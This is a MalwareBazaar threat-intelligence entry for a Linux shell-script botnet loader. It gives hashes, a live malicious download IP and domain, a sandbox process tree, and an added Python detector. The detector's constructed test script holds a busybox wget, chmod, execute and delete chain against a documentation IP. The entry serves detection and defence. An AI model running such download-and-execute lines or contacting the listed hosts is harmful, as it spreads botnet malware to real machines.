MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry



Threat unknown


Vendor detections: 6



SHA256 hash: 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224
SHA3-384 hash: b2a6e9113611abfc318cacd6689045d3e366b5d68dda027e458671d7f3e0c8a71abccecd8073107f70d4344cf2fa7461
SHA1 hash: 5e6aedbac8cf91fc0bca534574a4515bc9e9a5ba
MD5 hash: bf6c04b23c8b3aa13ef6991bc7002fe7
humanhash: iowa-texas-oxygen-robin
File name: bbc
File size: 517 bytes
First seen: 2026-01-10 01:18:50 UTC
Last seen: 2026-01-10 10:26:21 UTC
File type: sh
MIME type: text/x-shellscript
ssdeep: 12:lSjkOLZpqjWx5ozpqF82Q/NiTSCB+0j8BHAOy:lzgZpqyxmzpqF82QVg7B2BgT
TLSH: T16EF0270FB087F02A808435F89761F719AC3479A7A173DE9CB8853690FFC60207963244
TrID: 70.0% (.SH) Linux/UNIX shell script (7000/1)
      30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika: shell
Reporter: abuse_ch
Tags: sh
Associated URLs (columns: URL, Malware sample (SHA256 hash), Signature, Tags):
http://130.12.180.85/file/n/an/an/a

Intelligence


File Origin
# of uploads: 2
# of downloads: 105
Origin country: DE
Vendor Threat Intelligence
No detections
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox
Status: terminated
Behavior Graph (process tree and network contacts, reconstructed from the sandbox graph; per-process capability flags in square brackets, spawn method in parentheses):
  pid 2902  /usr/bin/sudo
  └─ pid 2906  /tmp/sample.bin  (execve)
     ├─ pid 2907  /usr/bin/uname  (execve)
     ├─ pid 2908  /usr/bin/busybox  (execve)
     ├─ pid 2910  /usr/bin/wget  [net, send-data, write-file]  (execve)
     │            -> 130.12.180.85:80  (send: 144B)
     ├─ pid 2925  /usr/bin/busybox  (execve)
     ├─ pid 2927  /tmp/data.x86_64  [net]  (execve)
     │            -> 8.8.8.8:53  (con)
     │  └─ pid 2929  /tmp/data.x86_64  (clone)
     │     └─ pid 2930  /tmp/data.x86_64  [write-config, zombie]  (clone)
     │        ├─ pid 2933  /usr/bin/dash  (execve)
     │        │  └─ pid 2934  /usr/bin/cp  (execve)
     │        └─ pid 2936  /tmp/data.x86_64  [dns, net, send-data, write-file, zombie]  (clone)
     │           -> 8.8.8.8:53  (send: 34B)
     │           -> cyber-reborn.com:25565  (send: 14B)
     │           ├─ pid 2937  /tmp/data.x86_64  (clone)
     │           │  └─ pid 2938  /usr/bin/dash  (execve)
     │           ├─ pid 2940  /usr/bin/dash  (execve)
     │           │  └─ pid 2942  /usr/sbin/xtables-nft-multi  (execve)
     │           └─ pid 2967  /usr/bin/dash  (execve)
     │              └─ pid 2969  /usr/sbin/xtables-nft-multi  (execve)
     ├─ pid 2931  /usr/bin/busybox  [delete-file]  (execve)
     └─ pid 2932  /usr/bin/busybox  [delete-file]  (execve)
Result
Malware family: n/a
Score: 7/10
Tags: credential_access defense_evasion discovery linux persistence
Behaviour:
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
Changes its process name
Reads system network configuration
Reads process memory
Enumerates active TCP sockets
Enumerates running processes
Modifies init.d
Modifies rc script
File and Directory Permissions Modification
Executes dropped EXE
Please note that we are no longer able to provide a coverage score for Virus Total.

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Author: Anish Bogati
Description: Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference: MalwareBazaar sample lilin.sh
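The rule above is technique-based rather than family-based: it keys on the loader shape (fetch a binary from a bare-IP URL, chmod it, run it, repeat per architecture, usually rm afterwards), which is exactly the chain the sandbox graph on this page shows for this 517-byte script (busybox, wget to 130.12.180.85:80, execution of /tmp/data.x86_64, two busybox delete-file calls). The Python below is an added example, not MalwareBazaar's code and not the rule author's YARA, that implements the same heuristic as a triage script and pulls out the network IOCs. Both input scripts are constructed for this example; they are not the contents of the real `bbc` sample, and 192.0.2.10 is a TEST-NET-1 address.

```python
"""Triage heuristic for Linux/IoT botnet loader shell scripts.

Added example for this page; it is neither MalwareBazaar's code nor the
YARA rule author's.  It implements in plain Python the technique the rule
description names (download from a numeric IP, chmod, execute, one line per
architecture, usually followed by rm) and extracts the network IOCs.  The
scripts at the bottom are constructed: they are NOT the real 'bbc' sample."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Download URL whose host is a bare IPv4 address (the loader tell-tale).
NUMERIC_IP_URL = re.compile(
    r"\b(?:https?|ftp|tftp)://(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?(?P<path>/\S*)?", re.I)
# Architecture suffix at the end of a dropped file name, e.g. data.x86_64
ARCH = re.compile(
    r"(x86_64|i[3-6]86|x86|aarch64|arm(?:v\d\w*|64|\d)?|mips(?:el|64)?|ppc|sh4|m68k|sparc)$",
    re.I)
DOWNLOADERS = {"wget", "curl", "ftpget"}
INTERPRETERS = {"sh", "bash", "ash", "dash", "nohup"}


def _base(tok: str) -> str:
    """'./data.x86_64' and '/tmp/data.x86_64' -> 'data.x86_64'."""
    return tok.rsplit("/", 1)[-1]


def _commands(line: str):
    """Yield each simple command of a shell line as a token list.

    Splits on ; && || | and a trailing &, after a crude comment strip; this is
    enough for loader scripts, which are almost always flat one-liners."""
    line = line.split("#", 1)[0]
    for cmd in re.split(r"\s*(?:;|&&|\|\||\||&)\s*", line):
        toks = cmd.split()
        if toks:
            yield toks


@dataclass
class Triage:
    urls: list = field(default_factory=list)    # numeric-IP download URLs, in order
    dropped: set = field(default_factory=set)   # file names written by a downloader
    chmodded: set = field(default_factory=set)  # file names given execute bits
    executed: set = field(default_factory=set)  # dropped files that were then run
    deleted: set = field(default_factory=set)   # file names passed to rm

    @property
    def ips(self) -> list:
        return sorted({urlparse(u).hostname for u in self.urls})

    @property
    def architectures(self) -> list:
        found = {m.group(1).lower() for n in self.dropped | self.executed
                 for m in [ARCH.search(n)] if m}
        return sorted(found)

    @property
    def is_loader(self) -> bool:
        # All legs of the technique: numeric-IP download, chmod, and execution
        # of something the script itself downloaded.
        return bool(self.urls) and bool(self.chmodded) and bool(self.dropped & self.executed)


def triage_script(text: str) -> Triage:
    t = Triage()
    for line in text.splitlines():
        for toks in _commands(line):
            head = _base(toks[0])
            if head == "busybox" and len(toks) > 1:   # 'busybox wget ...' applet form
                toks, head = toks[1:], toks[1]
            if head in DOWNLOADERS:
                m = NUMERIC_IP_URL.search(" ".join(toks))
                if not m:          # download from a hostname: not this pattern
                    continue
                t.urls.append(m.group(0))
                name = next((toks[i + 1] for i, a in enumerate(toks)
                             if a in ("-O", "-o") and i + 1 < len(toks)), None)
                if name is None:   # no explicit output name: wget uses the URL basename
                    name = _base(m.group("path") or "")
                if name and name != "-":
                    t.dropped.add(_base(name))
            elif head == "chmod":
                t.chmodded.update(_base(a) for a in toks[2:] if not a.startswith("-"))
            elif head == "rm":
                t.deleted.update(_base(a) for a in toks[1:] if not a.startswith("-"))
            else:
                target = _base(toks[1]) if head in INTERPRETERS and len(toks) > 1 else head
                if target in t.dropped:
                    t.executed.add(target)
    return t


# Constructed loader script (not the real sample): mirrors the sandbox chain on
# this page, i.e. busybox wget, chmod, execute, rm, once per architecture.
CONSTRUCTED_LOADER = """#!/bin/sh
cd /tmp || cd /var/run || cd /dev/shm
busybox wget http://192.0.2.10/bins/data.x86_64 -O data.x86_64; chmod 777 data.x86_64; ./data.x86_64; rm -rf data.x86_64
wget http://192.0.2.10/bins/data.mips -O data.mips; chmod +x data.mips; nohup ./data.mips ssh &
rm -rf data.mips
"""

# Constructed benign script: downloads from a hostname and executes nothing.
CONSTRUCTED_BENIGN = """#!/bin/sh
wget https://example.org/release.tar.gz -O release.tar.gz
tar xzf release.tar.gz
"""

if __name__ == "__main__":
    r = triage_script(CONSTRUCTED_LOADER)
    print("loader:", r.is_loader, "ips:", r.ips, "arch:", r.architectures,
          "executed:", sorted(r.executed), "self-deleted:", sorted(r.dropped & r.deleted))
    print("benign script flagged:", triage_script(CONSTRUCTED_BENIGN).is_loader)
```

The verdict requires all three legs on the same dropped file name, which is what keeps the benign download from matching; the caveat is that a loader using shell variables or a `for` loop over architecture names will not correlate by token and needs either loop unrolling or a weaker "any numeric-IP download plus any chmod" score, and `tftp -g -r` fetches (no URL scheme) are not covered at all.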

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Web download

File type: sh
SHA256 hash: 373bb1eae163c5766e0ed061f2373ef79866f10eae441657fc54cfcac9996224 (this sample)
Delivery method: Distributed via web download

Comments